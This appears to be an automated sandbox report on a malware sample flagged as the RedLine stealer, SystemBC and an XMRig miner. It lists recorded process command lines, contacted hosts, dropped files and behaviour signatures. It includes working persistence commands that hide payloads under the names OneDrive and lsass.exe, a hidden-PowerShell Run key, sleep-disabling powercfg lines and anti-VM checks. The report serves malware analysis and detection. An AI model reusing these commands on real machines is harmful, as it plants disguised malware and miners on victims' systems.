C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDBB0.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp

Files

memory/1584-54-0x0000000000380000-0x000000000039C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 781c3c16134f528d2a21882b21b2aa5b
SHA1 a9b173898e2639d27e7a3c16f8bb67107a5a037c
SHA256 65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49
SHA512 c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 781c3c16134f528d2a21882b21b2aa5b
SHA1 a9b173898e2639d27e7a3c16f8bb67107a5a037c
SHA256 65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49
SHA512 c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4Y2JHVI9TRNJEQWVOYRI.temp

MD5 781c3c16134f528d2a21882b21b2aa5b
SHA1 a9b173898e2639d27e7a3c16f8bb67107a5a037c
SHA256 65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49
SHA512 c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 781c3c16134f528d2a21882b21b2aa5b
SHA1 a9b173898e2639d27e7a3c16f8bb67107a5a037c
SHA256 65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49
SHA512 c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

memory/576-74-0x000000001B240000-0x000000001B522000-memory.dmp

memory/576-75-0x0000000002300000-0x0000000002308000-memory.dmp

memory/576-76-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/576-77-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/1768-80-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/876-82-0x00000000028E4000-0x00000000028E7000-memory.dmp

memory/1768-81-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/876-79-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/876-78-0x00000000028E0000-0x0000000002960000-memory.dmp

memory/1764-85-0x0000000002910000-0x0000000002990000-memory.dmp

memory/876-84-0x00000000028EB000-0x0000000002922000-memory.dmp

memory/1764-83-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1764-86-0x0000000002910000-0x0000000002990000-memory.dmp

memory/576-87-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/1768-88-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/1764-90-0x0000000002910000-0x0000000002990000-memory.dmp

memory/576-89-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/1768-91-0x0000000002540000-0x00000000025C0000-memory.dmp

memory/1768-92-0x0000000002820000-0x000000000282E000-memory.dmp

memory/1768-93-0x000000001B1C0000-0x000000001B1D0000-memory.dmp

memory/576-94-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/576-95-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/1764-96-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1764-98-0x0000000002910000-0x0000000002990000-memory.dmp

memory/576-99-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/1764-97-0x0000000002910000-0x0000000002990000-memory.dmp

memory/576-100-0x0000000002630000-0x00000000026B0000-memory.dmp

memory/1764-101-0x0000000002910000-0x0000000002990000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 781c3c16134f528d2a21882b21b2aa5b
SHA1 a9b173898e2639d27e7a3c16f8bb67107a5a037c
SHA256 65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49
SHA512 c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

memory/1544-122-0x0000000002690000-0x0000000002710000-memory.dmp

memory/1736-121-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1544-123-0x0000000002690000-0x0000000002710000-memory.dmp

memory/1544-124-0x0000000002690000-0x0000000002710000-memory.dmp

memory/1544-125-0x000000000269B000-0x00000000026D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1456-128-0x000000013F230000-0x000000013FBFA000-memory.dmp

memory/1736-129-0x0000000004370000-0x0000000004371000-memory.dmp

memory/1736-130-0x0000000004360000-0x0000000004361000-memory.dmp

memory/1736-131-0x0000000004380000-0x0000000004381000-memory.dmp

memory/1736-132-0x0000000004350000-0x0000000004351000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1004-140-0x0000000000310000-0x0000000000730000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 781c3c16134f528d2a21882b21b2aa5b
SHA1 a9b173898e2639d27e7a3c16f8bb67107a5a037c
SHA256 65820a01af399837debfb4b8464e3dcb4b2536c65426370bd3f44fcd10e38c49
SHA512 c46c6d6b8cbf00c0eb14ab4dfe9415424dbb8d498bc25cab3865ead6faa2103959ceb638007b55e8f4cf9f060a98db0f64a72ef9472ac6b974229d053d386e0c

memory/1832-148-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1832-149-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1832-150-0x0000000002580000-0x0000000002600000-memory.dmp

memory/1004-151-0x0000000000310000-0x0000000000730000-memory.dmp

memory/1004-152-0x0000000000D40000-0x0000000000D80000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2040-158-0x00000000000B0000-0x00000000000D0000-memory.dmp

memory/844-157-0x000000013FCB0000-0x000000014067A000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1736-160-0x0000000000400000-0x000000000083B000-memory.dmp

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1004-173-0x0000000000310000-0x0000000000730000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpDBB0.tmp.bat

MD5 7a55f4e0f7e01ecf5f08e1c7e7f28bd4
SHA1 83eb80089d5cc00735644947fcc3986d437d2535
SHA256 a9d1d25edcca21b7f6c411245b0b5b6c1ee4d4841307880e74de7a06ae338c29
SHA512 19c2e561daa88185f657e2ab93dfa90678dd8aac61ca817adca1ec9b489633a5d727647c50a4268404539a872280c35dafafc35e35b258bb60c778c1fc471b17

C:\Users\Admin\AppData\Local\Temp\tmpDBB0.tmp.bat

MD5 7a55f4e0f7e01ecf5f08e1c7e7f28bd4
SHA1 83eb80089d5cc00735644947fcc3986d437d2535
SHA256 a9d1d25edcca21b7f6c411245b0b5b6c1ee4d4841307880e74de7a06ae338c29
SHA512 19c2e561daa88185f657e2ab93dfa90678dd8aac61ca817adca1ec9b489633a5d727647c50a4268404539a872280c35dafafc35e35b258bb60c778c1fc471b17

memory/1860-176-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/1860-177-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/1860-178-0x0000000003100000-0x0000000003140000-memory.dmp

memory/1860-179-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-180-0x00000000003C0000-0x00000000003E0000-memory.dmp

memory/1736-181-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1880-182-0x0000000140000000-0x0000000140029000-memory.dmp

memory/2040-183-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-184-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-185-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/1860-188-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/1860-187-0x0000000003100000-0x0000000003140000-memory.dmp

memory/1880-186-0x0000000140000000-0x0000000140029000-memory.dmp

memory/2040-189-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/2040-191-0x00000000003C0000-0x00000000003E0000-memory.dmp

memory/1736-190-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-192-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/1736-194-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2040-195-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1860-196-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-198-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-199-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-200-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-202-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-203-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-204-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-206-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1860-208-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/1736-207-0x0000000000400000-0x000000000083B000-memory.dmp

memory/2040-210-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-211-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-212-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-214-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-215-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-216-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-218-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-219-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-220-0x00000000012A0000-0x00000000016C0000-memory.dmp

memory/2040-223-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1736-222-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1860-224-0x00000000012A0000-0x00000000016C0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-04 11:08

Reported

2023-05-04 11:10

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
